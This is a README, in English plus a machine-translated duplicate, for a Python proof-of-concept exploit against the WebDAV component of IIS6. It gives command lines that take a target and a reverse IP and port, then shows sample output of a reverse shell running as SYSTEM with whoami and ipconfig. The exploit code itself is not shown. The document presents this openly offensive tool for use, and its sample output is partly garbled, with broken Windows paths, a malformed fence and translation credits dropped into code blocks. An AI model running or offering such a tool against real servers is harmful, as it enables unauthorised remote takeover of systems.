PoC tool demonstrating an exploit for a known vulnerability in the WebDAV component of IIS6. This tool is designed for educational and research purposes to showcase how the vulnerability can be leveraged to execute arbitrary code on a remote server.
# EN
**GenWebDavIISExploit** is a PoC tool demonstrating an exploit for a known vulnerability in the WebDAV component of IIS6. This tool is designed for educational and research purposes to showcase how the vulnerability can be leveraged to execute arbitrary code on a remote server.
## Disclaimer
This project is intended for **educational purposes only**. Use this tool responsibly and only on systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal.
## Features
- Remote code execution on vulnerable IIS6 WebDAV servers.
- Dynamic payload generation with user-specified reverse IP and port.
- Easy-to-use command-line interface for rapid exploitation.
## Prerequisites
- **Python 3.x**: Ensure that Python 3 is installed on your system.
- **Network Access**: Ability to connect to the target machine's IP and port.
## Usage
### Command-Line Arguments
- **Target IP**: The IP address of the target IIS6 WebDAV server.
- **Target Port**: The port number on which the WebDAV service is running (usually 80).
- **Reverse IP**: Your IP address where the reverse shell should connect.
- **Reverse Port**: The port number on your system to receive the reverse shell.
## Example
```bash
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
```
## Usage Example
```bash
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
```
## Example output
```
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
[*] Connecting to target 192.168.1.10 on port 80...
[*] Sending a specially crafted HTTP request to exploit the vulnerability...
[*] Payload length: 1744 bytes
[*] Waiting for a return connection...
[+] Response from target:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0
[+] Received a connection back from 192.168.1.10:12345
[+] Remote access successfully established!
C:Windows\Windows\system32> whoami
nt authority\system
C:\Windows/system32> ipconfig
Windows IP Configuration
Ethernet Local Area Connection adapter:
DNS-127.00.1 . . . . . . . : example.local
IPv4 address. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . : 192.168.1.10
Subnet mask . . . . . . . . . . . . . . . . : 255.255.255.0
Main gateway . . . . . . . . . . . . . . . . : 192.168.1.1
```
## Notes
- Ensure you have a listener running on the specified reverse port to capture the incoming reverse shell.
- Use this tool only on authorized systems to test for vulnerabilities.
# RU
**GenWebDavIISExploit** is a PoC tool that demonstrates exploitation of a known vulnerability in the WebDAV component on IIS6. This tool is created for educational and research purposes to show how the vulnerability can be exploited to execute arbitrary code on a remote server.
Translated with DeepL.com (free version)
## Disclaimer
This project is intended **for educational purposes only**. Use this tool responsibly and only on systems that you own or have explicit permission to test. Unauthorized access to computer systems is illegal.
## Features
- Execution of remote code on vulnerable IIS6 WebDAV servers.
- Dynamic payload code generation with IP and port specification for the reverse connection.
- Simple command line interface for quick use.
## Requirements
- **Python 3.x**: Make sure you have Python 3 installed.
- **Network Access**: Ability to connect to the target machine's IP address and port.
## Usage
### Command line arguments
- **Target IP**: IP address of the target IIS6 WebDAV server.
- **Target Port**: The port number on which the WebDAV service is running (usually 80).
- **Reverse IP**: Your IP address to which the reverse connection should be established.
- **Reverse Port**: The port number on your system to receive the reverse connection.
## Example
```bash
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
```
## Example usage
````bash
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
```
## Example output
```
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
[*] Connecting to target 192.168.1.10 on port 80...
[*] Sending a specially crafted HTTP request to exploit the vulnerability...
[*] Payload length: 1744 bytes
[*] Waiting for a return connection...
Translated with DeepL.com (free version)
[+] Response from target:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0
[+] Received back connection from 192.168.1.10:12345
[+] Remote access successfully established!
C:Windows\Windows\system32> whoami
nt authority\system
C:\Windows/system32> ipconfig
Windows IP Configuration
Ethernet Local Area Connection adapter:
DNS connection suffix . . . . . . . : example.local
IPv4 address. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . : 192.168.1.10
Subnet Mask . . . . . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . . . . . . . . : 192.168.1.1
```
## Notes
- Make sure you have a listener running on the specified reverse port to intercept the incoming reverse connection.
- Use this tool only on authorized systems to check for vulnerabilities.
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view